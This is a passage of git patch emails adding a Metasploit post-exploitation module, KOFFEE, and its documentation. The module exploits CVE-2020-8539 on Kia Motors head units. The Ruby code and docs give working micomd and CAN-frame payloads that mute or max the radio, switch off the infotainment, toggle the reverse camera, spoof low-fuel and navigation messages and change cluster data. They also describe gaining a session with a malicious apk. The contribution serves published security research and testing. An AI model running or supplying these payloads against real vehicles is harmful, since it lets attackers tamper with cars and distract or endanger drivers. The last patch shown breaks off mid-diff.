From 58855af6c62fbc3a5e4e61ec676f6223bb455b96 Mon Sep 17 00:00:00 2001 From: gianpyc Date: Wed, 7 Apr 2021 05:33:53 -0400 Subject: [PATCH 1/8] KOFFEE first commit. This module exploits the Arbitrary Code Execution vulnerabilty (CVE-2020-8539) --- modules/post/android/local/koffee.rb | 240 +++++++++++++++++++++++++++ 1 file changed, 240 insertions(+) create mode 100644 modules/post/android/local/koffee.rb diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb new file mode 100644 index 0000000000..9ffe51980b --- /dev/null +++ b/modules/post/android/local/koffee.rb @@ -0,0 +1,240 @@ +# frozen_string_literal: true + +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +require 'readline' + +class MetasploitModule < Msf::Post + Rank = ExcellentRanking + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'KOFFEE - Kia OFFensivE Exploit', + 'Description' => %q{ + This module exploits CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user to execute the micomd binary file of a Kia Motors vehicle. This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software version. + This module allows an attacker to send crafted micomd commands that allow the attacker + to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle. + }, + 'Author' => + [ + 'Gianpiero Costantino', + 'Ilaria Matteucci' + ], + 'References' => + [ + ['CVE', '2020-8539'], + ['URL', 'https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf'] + ], + 'Platform' => 'Android', + 'Arch' => [ARCH_ARMLE], + 'DisclosureDate' => '2020-12-02', + 'Targets' => [[ 'Automatic', {}]], + 'DefaultTarget' => 0, + 'License' => MSF_LICENSE + ) + ) + register_options([ + OptString.new('MICOMD', [true, 'Path to micomd executable', '/system/bin/micomd']), + OptString.new('PERIOD', [true, 'Time (ms) interval between two MICOM commands, aka Period of CAN frames', '0.200']), + OptInt.new('NUM_MSG', [true, 'Number of MICOM commands sent each time', '5']) + ]) + end + + def send(m_cmd) + print_status(' -- Sending Command -- ') + cmd = "#{datastore['MICOMD']} -c inject #{m_cmd}" + cmd_exec(cmd) + end + + def send_out(m_cmd) + print_status(' -- Sending Command -- ') + cmd = "#{datastore['MICOMD']} -c inject-outgoing #{m_cmd}" + cmd_exec(cmd) + end + + def send_custom(m_cmd) + cmd = "#{datastore['MICOMD']} -c inject #{m_cmd}" + var = 0 + while var < datastore['NUM_MSG'].to_s.to_i + cmd_exec(cmd) + var += 1 + print_status("> Sending #{var} out of #{datastore['NUM_MSG']}") + sleep(datastore['PERIOD'].to_s.to_f) + end + end + + def send_out_custom(m_cmd) + cmd = "#{datastore['MICOMD']} -c inject-outgoing #{m_cmd}" + var = 0 + while var < datastore['Num_msg'].to_s.to_i + cmd_exec(cmd) + var += 1 + print_status("> Sending #{var} out of #{datastore['NUM_MSG']}") + sleep(datastore['PERIOD'].to_s.to_f) + end + end + + def run + loop do + print_status(' ') + print_status(" `:+ydmNMMNmhs: + .odMMMMMMMMMMMMMMm` + /dM MMMMMMM MMMMMMM: o` + /mMMM MMMMMM MMMMMMm-`yMs + .dMMMMM MMMMM MMMMMm+ :mMMN + :NMMMMMM MMMM MMMMh/ :hMMMMN + /MMMMMMMM MMM Mmy/`.omMMMMMMy +.NMMMMMMMM my+:`./smMMMMMMMMN. +yMMMMMMNy/ `/shNMMMMMMMMMMMM/ +NMMMMd/`-s MM MMMMMMMMMMMMN: +NMMd- +mMM MMM MMMMMMMMMMd. +sMo :mMMMM MMMM MMMMMMMm/ +`/ oMMMMMM MMMMM MMMMd/ + .NMMMMMM MMMMMM do. + :shmNMMNmdy+:` ") + print_status(' ') + print_status(' -- Welcome, would you like a KOFFEE? --') + print_status(' ') + print_status("Make your choice: + 1. Mute/unmute radio + 2. Reduce radio volume + 3. Radio volume at maximum + 4. Low screen brightness + 5. High screen brightness + 6. Low fuel warning message + 7. Navigation full screen + 8. Set navigation address + 9. Seek down + 10. Seek Up + 11. Switch off Infotainment + 12. Switch On Infotainment + 13. Camera Reverse On + 14. Camera Reverse Off + 15. Inject pre-crafted CAN frames into MM bus + 16. Inject custom command + 0. Exit") + n = Readline.readline('Koffee > ').to_i + break if n.zero? + + case n + when 1 + send('8351 04') + when 2 + send_out('0112 F4 01') + when 3 + send_out('0112 F0') + when 4 + send('8353 07 01') + when 5 + send('8353 07 00') + when 6 + send('8353 0B 01') + when 7 + send('8350 0C 01') + when 8 + send('8350 0D 03') + when 9 + send_out('133 01') + when 10 + send_out('133 02') + when 11 + send_out('170 00') + when 12 + send_out('170 01') + when 13 + send('8353 03 01') + when 14 + send('8353 03 00') + when 15 + print_status("Select the action: + 1. Change cluster language + 2. Change speed limit + 3. Round about far far far away + 4. Random navigation signals + 5. Modify radio info + 0. Back") + s = Readline.readline('Koffee > ').to_i + case s + when 1 + print_status(' -- Korean -- ') + send_out_custom('4D3 01') + print_status(' -- Arabic -- ') + send_out_custom('4D3 08') + print_status(' -- Polish -- ') + send_out_custom('4D3 0E') + print_status(' -- Italian -- ') + send_out_custom('4D3 12') + when 2 + send_out_custom('4DB 00 0A') + send_out_custom('4DB 00 2A') + send_out_custom('4DB 00 3A') + send_out_custom('4DB 00 5A') + send_out_custom('4DB 00 7A') + send_out_custom('4DB 00 9A') + send_out_custom('4DB 00 AA') + send_out_custom('4DB 00 BA') + when 3 + print_status(' -- km -- ') + send_out_custom('4D1 66 00 00 00 14 86 10 00') + print_status(' -- mi -- ') + send_out_custom('4D1 66 00 00 00 14 86 20 00') + print_status(' -- ft -- ') + send_out_custom('4D1 66 00 00 00 14 86 30 00') + print_status(' -- yd -- ') + send_out_custom('4D1 66 00 00 00 14 86 40 00') + print_status(' -- No distance -- ') + send_out_custom('4D1 66 00 00 00 14 86 50 00') + when 4 + print_status(' -- Calculating the route -- ') + send_out_custom('4D1 09') + print_status(' -- Recalculating the route -- ') + send_out_custom('4D1 0A') + print_status(' -- Straight ahead -- ') + send_out_custom('4D1 0D') + print_status(' -- Exit on the Right -- ') + send_out_custom('4D1 13') + print_status(' -- Exit on the Left -- ') + send_out_custom('4D1 14') + when 5 + print_status(' -- USB Music -- ') + send_out_custom('4D6 65') + print_status(' -- Android Auto -- ') + send_out_custom('4D6 6F') + print_status(' -- FM 168.17 -- ') + send_out_custom('4D6 11 9D 00 00 00 00 5F 83') + print_status(' -- FM1 168.17 -- ') + send_out_custom('4D6 12 9D 00 00 00 00 5F 83') + print_status(' -- FM2 168.17 -- ') + send_out_custom('4D6 13 9D 00 00 00 00 5F 83') + else + print_status('Nothing to do...') + end + when 16 + print_status("Type of sending: + 1. Inject + 2. Inject-outgoing + 0. Back") + s = Readline.readline('Koffee > ').to_i + + case s + when 1 + print_status('Insert the command (e.g., cmd byte1 byte2 byte3):') + cmd = gets.chomp + send_custom(cmd) + when 2 + print_status('> Insert the command (e.g., cmd byte1 byte2 byte3):') + cmd = gets.chomp + send_out_custom(cmd) + else + print_status('Nothing to do...') + end + else + print_status('Exiting') + end + end + end +end From 84babda37d96ddd6afa7961ca76afeb05e280cac Mon Sep 17 00:00:00 2001 From: gianpyc Date: Fri, 9 Apr 2021 10:45:35 -0400 Subject: [PATCH 2/8] Adding documentation for KOFFEE exploit --- .../modules/post/android/local/koffee.md | 82 +++++++++++++++++++ 1 file changed, 82 insertions(+) create mode 100644 documentation/modules/post/android/local/koffee.md diff --git a/documentation/modules/post/android/local/koffee.md b/documentation/modules/post/android/local/koffee.md new file mode 100644 index 0000000000..90396bf057 --- /dev/null +++ b/documentation/modules/post/android/local/koffee.md @@ -0,0 +1,82 @@ +## Vulnerable Application + +KOFFEE exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user to execute the micomd binary with valid payloads on Kia Motors Head Units. +By using KOFFEE an attacker can send crafted micomd commands to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle. + +### Vulnerable Head Unit software versions +- SOP.003.30.180703 +- SOP.005.7.181019 +- SOP.007.1.191209 + +## Verification Steps + +- [ ] Start `msfconsole` +- [ ] `use post/android/local/koffee` +- [ ] `set session 1` +- [ ] `run` + +### What do you need +* An active session with the Head Unit + +## Options +- MICOMD: it contains the path to micomd executable +- NUM_MSG: it expresses the number of MICOM commands sent each time +- PERIOD: it indicates the time (ms) interval between two MICOM commands, aka Period of CAN frames +- SESSION: it referes to the metasploit session number on which this module is run. + +## Scenarios +KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). First, an attacker may create a malicious apk to generate a remote connection with the HU. For instace, using msfvenom or other tools, an attacker can create the malicious apk that, once installed in the HU, starts an active session. +At this point, the attacker is able to use the KOFFEE exploit to take control of the HU and inject CAN bus frames into the M-CAN bus of the vehicle. + + +### Usage + +```bach +msf6 > use post/android/local/koffee +msf6 post(android/local/koffee) > set session 1 +session => 1 +msf6 post(android/local/koffee) > run + +[*] +[*] `:+ydmNMMNmhs: + .odMMMMMMMMMMMMMMm` + /dM MMMMMMM MMMMMMM: o` + /mMMM MMMMMM MMMMMMm-`yMs + .dMMMMM MMMMM MMMMMm+ :mMMN + :NMMMMMM MMMM MMMMh/ :hMMMMN + /MMMMMMMM MMM Mmy/`.omMMMMMMy +.NMMMMMMMM my+:`./smMMMMMMMMN. +yMMMMMMNy/ `/shNMMMMMMMMMMMM/ +NMMMMd/`-s MM MMMMMMMMMMMMN: +NMMd- +mMM MMM MMMMMMMMMMd. +sMo :mMMMM MMMM MMMMMMMm/ +`/ oMMMMMM MMMMM MMMMd/ + .NMMMMMM MMMMMM do. + :shmNMMNmdy+:` +[*] +[*] -- Welcome, would you like a KOFFEE? -- +[*] +[*] Make your choice: + 1. Mute/unmute radio + 2. Reduce radio volume + 3. Radio volume at maximum + 4. Low screen brightness + 5. High screen brightness + 6. Low fuel warning message + 7. Navigation full screen + 8. Set navigation address + 9. Seek down + 10. Seek Up + 11. Switch off Infotainment + 12. Switch On Infotainment + 13. Camera Reverse On + 14. Camera Reverse Off + 15. Inject pre-crafted CAN frames into MM bus + 16. Inject custom command + 0. Exit +Koffee > 1 +[*] -- Sending Command -- +... +Koffee > 0 +[*] Post module execution completed +``` From e9088cfc120e4f625a63de14d12da9f8198a1ff1 Mon Sep 17 00:00:00 2001 From: gianpyc Date: Mon, 12 Apr 2021 04:13:03 -0400 Subject: [PATCH 3/8] Run rubocop and msftidy_docs, both on the module and documentation --- documentation/modules/post/android/local/koffee.md | 13 +++++++++---- modules/post/android/local/koffee.rb | 5 +++-- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/documentation/modules/post/android/local/koffee.md b/documentation/modules/post/android/local/koffee.md index 90396bf057..ed708cf8d0 100644 --- a/documentation/modules/post/android/local/koffee.md +++ b/documentation/modules/post/android/local/koffee.md @@ -1,7 +1,9 @@ ## Vulnerable Application -KOFFEE exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user to execute the micomd binary with valid payloads on Kia Motors Head Units. -By using KOFFEE an attacker can send crafted micomd commands to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle. +KOFFEE exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user +to execute the micomd binary with valid payloads on Kia Motors Head Units. +By using KOFFEE an attacker can send crafted micomd commands to control the head unit and send CAN bus frames +into the Multimedia CAN (M-Can) of the vehicle. ### Vulnerable Head Unit software versions - SOP.003.30.180703 @@ -25,8 +27,11 @@ By using KOFFEE an attacker can send crafted micomd commands to control the head - SESSION: it referes to the metasploit session number on which this module is run. ## Scenarios -KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). First, an attacker may create a malicious apk to generate a remote connection with the HU. For instace, using msfvenom or other tools, an attacker can create the malicious apk that, once installed in the HU, starts an active session. -At this point, the attacker is able to use the KOFFEE exploit to take control of the HU and inject CAN bus frames into the M-CAN bus of the vehicle. +KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). +First, an attacker may create a malicious apk to generate a remote connection with the HU. +For instace, using msfvenom or other tools, an attacker can create the malicious apk that, once installed in the HU, +starts an active session. Now, the attacker is able to use the KOFFEE exploit to take control of the HU and +inject CAN bus frames into the M-CAN bus of the vehicle. ### Usage diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb index 9ffe51980b..a2f6e19b92 100644 --- a/modules/post/android/local/koffee.rb +++ b/modules/post/android/local/koffee.rb @@ -15,8 +15,9 @@ class MetasploitModule < Msf::Post info, 'Name' => 'KOFFEE - Kia OFFensivE Exploit', 'Description' => %q{ - This module exploits CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows a user to execute the micomd binary file of a Kia Motors vehicle. This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software version. - This module allows an attacker to send crafted micomd commands that allow the attacker + This module exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows an to attacker execute the micomd binary file Kia Motors of Head Unit. + This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software version. + This module, run on an active session, allows an attacker to send crafted micomd commands that allow the attacker to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle. }, 'Author' => From cffb82e8d963d9a6685716aadf338b722c0426f6 Mon Sep 17 00:00:00 2001 From: gianpyc Date: Tue, 13 Apr 2021 10:00:12 -0400 Subject: [PATCH 4/8] Updating KOFFEE module enabling actions that can be selected by a user to trigger functionalities on the head unit --- modules/post/android/local/koffee.rb | 217 +++++++-------------------- 1 file changed, 55 insertions(+), 162 deletions(-) diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb index a2f6e19b92..be301c7a5b 100644 --- a/modules/post/android/local/koffee.rb +++ b/modules/post/android/local/koffee.rb @@ -7,7 +7,6 @@ require 'readline' class MetasploitModule < Msf::Post - Rank = ExcellentRanking def initialize(info = {}) super( @@ -15,11 +14,12 @@ class MetasploitModule < Msf::Post info, 'Name' => 'KOFFEE - Kia OFFensivE Exploit', 'Description' => %q{ - This module exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerabilty that allows an to attacker execute the micomd binary file Kia Motors of Head Unit. + This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to attacker execute the micomd binary file on the head unit of Kia Motors. This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software version. This module, run on an active session, allows an attacker to send crafted micomd commands that allow the attacker to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle. }, + 'SessionTypes' => ['meterpreter'], 'Author' => [ 'Gianpiero Costantino', @@ -30,31 +30,39 @@ class MetasploitModule < Msf::Post ['CVE', '2020-8539'], ['URL', 'https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf'] ], + 'Actions' => [ + [ 'TOGGLE_RADIO_MUTE', { 'Description' => 'It mutes/umutes the radio' } ], + [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It reduces radio volume' } ], + [ 'MAX_RADIO_VOLUME', { 'Description' => 'It sets the radio volume to the max' } ], + [ 'CHANGE_CLUSTER_LANGUAGE', { 'Description' => 'It changes the cluster language' } ], + [ 'INJECT_CUSTOM', { 'Description' => 'It injects custom micom payloads' } ] + ], + 'DefaultAction' => 'TOGGLE_RADIO_MUTE', 'Platform' => 'Android', - 'Arch' => [ARCH_ARMLE], 'DisclosureDate' => '2020-12-02', - 'Targets' => [[ 'Automatic', {}]], - 'DefaultTarget' => 0, 'License' => MSF_LICENSE ) ) register_options([ OptString.new('MICOMD', [true, 'Path to micomd executable', '/system/bin/micomd']), OptString.new('PERIOD', [true, 'Time (ms) interval between two MICOM commands, aka Period of CAN frames', '0.200']), - OptInt.new('NUM_MSG', [true, 'Number of MICOM commands sent each time', '5']) + OptInt.new('NUM_MSG', [true, 'Number of MICOM commands sent each time', '5']), + OptString.new('CMD_PAYLOAD', [ false, 'Micom payload to inject, e.g., cmd byte1 byte3 byte2', '00 00 00'], conditions: %w[ACTION == INJECT_CUSTOM]), ]) end - def send(m_cmd) + def send_in(m_cmd) print_status(' -- Sending Command -- ') cmd = "#{datastore['MICOMD']} -c inject #{m_cmd}" cmd_exec(cmd) + print_good(' -- Command Sent-- ') end def send_out(m_cmd) print_status(' -- Sending Command -- ') cmd = "#{datastore['MICOMD']} -c inject-outgoing #{m_cmd}" cmd_exec(cmd) + print_good(' -- Command Sent-- ') end def send_custom(m_cmd) @@ -66,6 +74,7 @@ class MetasploitModule < Msf::Post print_status("> Sending #{var} out of #{datastore['NUM_MSG']}") sleep(datastore['PERIOD'].to_s.to_f) end + print_good(' -- Custom payload Sent-- ') end def send_out_custom(m_cmd) @@ -77,165 +86,49 @@ class MetasploitModule < Msf::Post print_status("> Sending #{var} out of #{datastore['NUM_MSG']}") sleep(datastore['PERIOD'].to_s.to_f) end + print_good(' -- CAN bus frames sent-- ') end def run - loop do - print_status(' ') - print_status(" `:+ydmNMMNmhs: - .odMMMMMMMMMMMMMMm` - /dM MMMMMMM MMMMMMM: o` - /mMMM MMMMMM MMMMMMm-`yMs - .dMMMMM MMMMM MMMMMm+ :mMMN - :NMMMMMM MMMM MMMMh/ :hMMMMN - /MMMMMMMM MMM Mmy/`.omMMMMMMy -.NMMMMMMMM my+:`./smMMMMMMMMN. -yMMMMMMNy/ `/shNMMMMMMMMMMMM/ -NMMMMd/`-s MM MMMMMMMMMMMMN: -NMMd- +mMM MMM MMMMMMMMMMd. -sMo :mMMMM MMMM MMMMMMMm/ -`/ oMMMMMM MMMMM MMMMd/ - .NMMMMMM MMMMMM do. - :shmNMMNmdy+:` ") - print_status(' ') - print_status(' -- Welcome, would you like a KOFFEE? --') - print_status(' ') - print_status("Make your choice: - 1. Mute/unmute radio - 2. Reduce radio volume - 3. Radio volume at maximum - 4. Low screen brightness - 5. High screen brightness - 6. Low fuel warning message - 7. Navigation full screen - 8. Set navigation address - 9. Seek down - 10. Seek Up - 11. Switch off Infotainment - 12. Switch On Infotainment - 13. Camera Reverse On - 14. Camera Reverse Off - 15. Inject pre-crafted CAN frames into MM bus - 16. Inject custom command - 0. Exit") - n = Readline.readline('Koffee > ').to_i - break if n.zero? + # all conditional options are required when active, make sure none of them are blank + options.each_pair do |name, option| + next if option.conditions.empty? + next unless Msf::OptCondition.show_option(self, option) - case n - when 1 - send('8351 04') - when 2 - send_out('0112 F4 01') - when 3 - send_out('0112 F0') - when 4 - send('8353 07 01') - when 5 - send('8353 07 00') - when 6 - send('8353 0B 01') - when 7 - send('8350 0C 01') - when 8 - send('8350 0D 03') - when 9 - send_out('133 01') - when 10 - send_out('133 02') - when 11 - send_out('170 00') - when 12 - send_out('170 01') - when 13 - send('8353 03 01') - when 14 - send('8353 03 00') - when 15 - print_status("Select the action: - 1. Change cluster language - 2. Change speed limit - 3. Round about far far far away - 4. Random navigation signals - 5. Modify radio info - 0. Back") - s = Readline.readline('Koffee > ').to_i - case s - when 1 - print_status(' -- Korean -- ') - send_out_custom('4D3 01') - print_status(' -- Arabic -- ') - send_out_custom('4D3 08') - print_status(' -- Polish -- ') - send_out_custom('4D3 0E') - print_status(' -- Italian -- ') - send_out_custom('4D3 12') - when 2 - send_out_custom('4DB 00 0A') - send_out_custom('4DB 00 2A') - send_out_custom('4DB 00 3A') - send_out_custom('4DB 00 5A') - send_out_custom('4DB 00 7A') - send_out_custom('4DB 00 9A') - send_out_custom('4DB 00 AA') - send_out_custom('4DB 00 BA') - when 3 - print_status(' -- km -- ') - send_out_custom('4D1 66 00 00 00 14 86 10 00') - print_status(' -- mi -- ') - send_out_custom('4D1 66 00 00 00 14 86 20 00') - print_status(' -- ft -- ') - send_out_custom('4D1 66 00 00 00 14 86 30 00') - print_status(' -- yd -- ') - send_out_custom('4D1 66 00 00 00 14 86 40 00') - print_status(' -- No distance -- ') - send_out_custom('4D1 66 00 00 00 14 86 50 00') - when 4 - print_status(' -- Calculating the route -- ') - send_out_custom('4D1 09') - print_status(' -- Recalculating the route -- ') - send_out_custom('4D1 0A') - print_status(' -- Straight ahead -- ') - send_out_custom('4D1 0D') - print_status(' -- Exit on the Right -- ') - send_out_custom('4D1 13') - print_status(' -- Exit on the Left -- ') - send_out_custom('4D1 14') - when 5 - print_status(' -- USB Music -- ') - send_out_custom('4D6 65') - print_status(' -- Android Auto -- ') - send_out_custom('4D6 6F') - print_status(' -- FM 168.17 -- ') - send_out_custom('4D6 11 9D 00 00 00 00 5F 83') - print_status(' -- FM1 168.17 -- ') - send_out_custom('4D6 12 9D 00 00 00 00 5F 83') - print_status(' -- FM2 168.17 -- ') - send_out_custom('4D6 13 9D 00 00 00 00 5F 83') - else - print_status('Nothing to do...') - end - when 16 - print_status("Type of sending: - 1. Inject - 2. Inject-outgoing - 0. Back") - s = Readline.readline('Koffee > ').to_i - - case s - when 1 - print_status('Insert the command (e.g., cmd byte1 byte2 byte3):') - cmd = gets.chomp - send_custom(cmd) - when 2 - print_status('> Insert the command (e.g., cmd byte1 byte2 byte3):') - cmd = gets.chomp - send_out_custom(cmd) - else - print_status('Nothing to do...') - end - else - print_status('Exiting') - end + fail_with(Failure::BadConfig, "The #{name} option is required by the #{action.name} action.") if datastore[name].blank? end + print_status(' -- Starting action -- ') + send("action_#{action.name.downcase}") + end + + def action_toggle_radio_mute + print_status(' -- Mute/umute radio -- ') + send_in('8351 04') + end + + def action_reduce_radio_volume + print_status(' -- Reduce radio volume -- ') + send_out('0112 F4 01') + end + + def action_max_radio_volume + print_status(' -- Max radio volume -- ') + send_out('0112 F0') + end + + def action_change_cluster_language + print_status(' -- Korean -- ') + send_out_custom('4D3 01') + print_status(' -- Arabic -- ') + send_out_custom('4D3 08') + print_status(' -- Polish -- ') + send_out_custom('4D3 0E') + print_status(' -- Italian -- ') + send_out_custom('4D3 12') + end + + def action_inject_custom + print_status(" -- Injecting custom payload (#{datastore['CMD_PAYLOAD']}) -- ") + send_custom(datastore['CMD_PAYLOAD']) end end From c4956ce19b3d5358e2a240d042e6dbbcbe5b1c47 Mon Sep 17 00:00:00 2001 From: gianpyc Date: Fri, 16 Apr 2021 04:54:29 -0400 Subject: [PATCH 5/8] Updatied the module with the full set of actions --- .../modules/post/android/local/koffee.md | 83 +++++++++---------- modules/post/android/local/koffee.rb | 74 +++++++++++++++-- 2 files changed, 108 insertions(+), 49 deletions(-) diff --git a/documentation/modules/post/android/local/koffee.md b/documentation/modules/post/android/local/koffee.md index ed708cf8d0..f5d27ff59e 100644 --- a/documentation/modules/post/android/local/koffee.md +++ b/documentation/modules/post/android/local/koffee.md @@ -15,7 +15,7 @@ into the Multimedia CAN (M-Can) of the vehicle. - [ ] Start `msfconsole` - [ ] `use post/android/local/koffee` - [ ] `set session 1` -- [ ] `run` +- [ ] `toogle_radio_mute` or `run` ### What do you need * An active session with the Head Unit @@ -25,6 +25,40 @@ into the Multimedia CAN (M-Can) of the vehicle. - NUM_MSG: it expresses the number of MICOM commands sent each time - PERIOD: it indicates the time (ms) interval between two MICOM commands, aka Period of CAN frames - SESSION: it referes to the metasploit session number on which this module is run. +- CMD_PAYLOAD: It refers to the Micom payload to be injected, e.g., cmd byte1 byte3 byte2'. +By default it is set to `00 00 00`. This options works only for the `INJECT_CUSTOM` action + +## Actions + +The following actions can be triggered on the Head Unit. An action can be triggerd by inserting in the +metasploit input console the action name in lowercase, e.g., camera_reverse_off. + +- CAMERA_REVERSE_OFF: It hides the parking camera video stream +- CAMERA_REVERSE_ON: It shows the parking camera video stream +- CHANGE_CLUSTER_LANGUAGE: It changes the cluster language +- HIGH_SCREEN_BRIGHTNESS: It increases the head unit screen brightness +- INJECT_CUSTOM: It injects custom micom payloads +- LOW_FUEL_WARNING: It pops up a low fuel message on the head unit +- LOW_SCREEN_BRIGHTNESS: It decreses the head unit screen brightness +- MAX_RADIO_VOLUME: It sets the radio volume to the max + - NAVIGATION_FULL_SCREEN: It pops up the nagitaion app +- REDUCE_RADIO_VOLUME: It reduces radio volume +- SEEK_DOWN_SEARCH: It triggers the seek down radio frequency search +- SEEK_UP_SEARCH: It triggers the seek up radio frequency search +- SET_NAVIGATION_ADDRESS: It pops up the nagitaion address window +- SWITCH_OFF_Hu: It switches off the head unit +- SWITCH_ON_Hu: It switches on the head unit + - TOGGLE_RADIO_MUTE It mutes/umutes the radio + +An action can be also triggered using the commands: +- [ ] `set action CAMERA_REVERSE_ON` +- [ ] `run` + +To execute the `INJECT_CUSTOM` action, you may want also to set up the right payload. +The commands to use to trigger this action are +- [ ] `set action INJECT_CUSTOM` +- [ ] `set CMD_PAYLOAD 01 FF` +- [ ] `run` ## Scenarios KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). @@ -40,48 +74,9 @@ inject CAN bus frames into the M-CAN bus of the vehicle. msf6 > use post/android/local/koffee msf6 post(android/local/koffee) > set session 1 session => 1 -msf6 post(android/local/koffee) > run +msf6 post(android/local/koffee) > toggle_radio_mute -[*] -[*] `:+ydmNMMNmhs: - .odMMMMMMMMMMMMMMm` - /dM MMMMMMM MMMMMMM: o` - /mMMM MMMMMM MMMMMMm-`yMs - .dMMMMM MMMMM MMMMMm+ :mMMN - :NMMMMMM MMMM MMMMh/ :hMMMMN - /MMMMMMMM MMM Mmy/`.omMMMMMMy -.NMMMMMMMM my+:`./smMMMMMMMMN. -yMMMMMMNy/ `/shNMMMMMMMMMMMM/ -NMMMMd/`-s MM MMMMMMMMMMMMN: -NMMd- +mMM MMM MMMMMMMMMMd. -sMo :mMMMM MMMM MMMMMMMm/ -`/ oMMMMMM MMMMM MMMMd/ - .NMMMMMM MMMMMM do. - :shmNMMNmdy+:` -[*] -[*] -- Welcome, would you like a KOFFEE? -- -[*] -[*] Make your choice: - 1. Mute/unmute radio - 2. Reduce radio volume - 3. Radio volume at maximum - 4. Low screen brightness - 5. High screen brightness - 6. Low fuel warning message - 7. Navigation full screen - 8. Set navigation address - 9. Seek down - 10. Seek Up - 11. Switch off Infotainment - 12. Switch On Infotainment - 13. Camera Reverse On - 14. Camera Reverse Off - 15. Inject pre-crafted CAN frames into MM bus - 16. Inject custom command - 0. Exit -Koffee > 1 -[*] -- Sending Command -- -... -Koffee > 0 -[*] Post module execution completed +[*] -- Starting action -- +[*] -- Mute/umute radio -- +[+] -- Command Sent -- ``` diff --git a/modules/post/android/local/koffee.rb b/modules/post/android/local/koffee.rb index be301c7a5b..fee272fae8 100644 --- a/modules/post/android/local/koffee.rb +++ b/modules/post/android/local/koffee.rb @@ -32,8 +32,19 @@ class MetasploitModule < Msf::Post ], 'Actions' => [ [ 'TOGGLE_RADIO_MUTE', { 'Description' => 'It mutes/umutes the radio' } ], - [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It reduces radio volume' } ], + [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It decreses the radio volume' } ], [ 'MAX_RADIO_VOLUME', { 'Description' => 'It sets the radio volume to the max' } ], + [ 'LOW_SCREEN_BRIGHTNESS', { 'Description' => 'It decreses the head unit screen brightness' } ], + [ 'HIGH_SCREEN_BRIGHTNESS', { 'Description' => 'It increases the head unit screen brightness' } ], + [ 'LOW_FUEL_WARNING', { 'Description' => 'It pops up a low fuel message on the head unit' } ], + [ 'NAVIGATION_FULL_SCREEN', { 'Description' => 'It pops up the navigation app window' } ], + [ 'SET_NAVIGATION_ADDRESS', { 'Description' => 'It pops up the navigation address window' } ], + [ 'SEEK_DOWN_SEARCH', { 'Description' => 'It triggers the seek down radio frequency search' } ], + [ 'SEEK_UP_SEARCH', { 'Description' => 'It triggers the seek up radio frequency search' } ], + [ 'SWITCH_ON_Hu', { 'Description' => 'It switches on the head unit' } ], + [ 'SWITCH_OFF_Hu', { 'Description' => 'It switches off the head unit' } ], + [ 'CAMERA_REVERSE_ON', { 'Description' => 'It shows the parking camera video stream' } ], + [ 'CAMERA_REVERSE_OFF', { 'Description' => 'It hides the parking camera video stream' } ], [ 'CHANGE_CLUSTER_LANGUAGE', { 'Description' => 'It changes the cluster language' } ], [ 'INJECT_CUSTOM', { 'Description' => 'It injects custom micom payloads' } ] ], @@ -52,17 +63,15 @@ class MetasploitModule < Msf::Post end def send_in(m_cmd) - print_status(' -- Sending Command -- ') cmd = "#{datastore['MICOMD']} -c inject #{m_cmd}" cmd_exec(cmd) - print_good(' -- Command Sent-- ') + print_good(' -- Command Sent -- ') end def send_out(m_cmd) - print_status(' -- Sending Command -- ') cmd = "#{datastore['MICOMD']} -c inject-outgoing #{m_cmd}" cmd_exec(cmd) - print_good(' -- Command Sent-- ') + print_good(' -- Command Sent -- ') end def send_custom(m_cmd) @@ -116,6 +125,61 @@ class MetasploitModule < Msf::Post send_out('0112 F0') end + def action_low_screen_brightness + print_status(' -- Low screen brightness -- ') + send_in('8353 07 01') + end + + def action_high_screen_brightness + print_status(' -- High screen brightness -- ') + send_in('8353 07 00') + end + + def action_low_fuel_warning + print_status(' -- Low fuel warning -- ') + send_in('8353 0B 01') + end + + def action_navigation_full_screen + print_status(' -- Navigation windows full screen -- ') + send_in('8353 0C 01') + end + + def action_set_navigation_address + print_status(' -- Navigation address window pops up -- ') + send_in('8353 0D 03') + end + + def action_seek_down_search + print_status(' -- Seek down radio search -- ') + send_out('133 01') + end + + def action_seek_up_search + print_status(' -- Seek up radio search -- ') + send_out('133 02') + end + + def action_switch_on_hu + print_status(' -- Switch on Head unit -- ') + send_out('170 01') + end + + def action_switch_off_hu + print_status(' -- Switch off Head unit -- ') + send_out('170 00') + end + + def action_camera_reverse_on + print_status(' -- Parking camera video stream on -- ') + send_in('8353 03 01') + end + + def action_camera_reverse_off + print_status(' -- Parking camera video stream off -- ') + send_in('8353 03 00') + end + def action_change_cluster_language print_status(' -- Korean -- ') 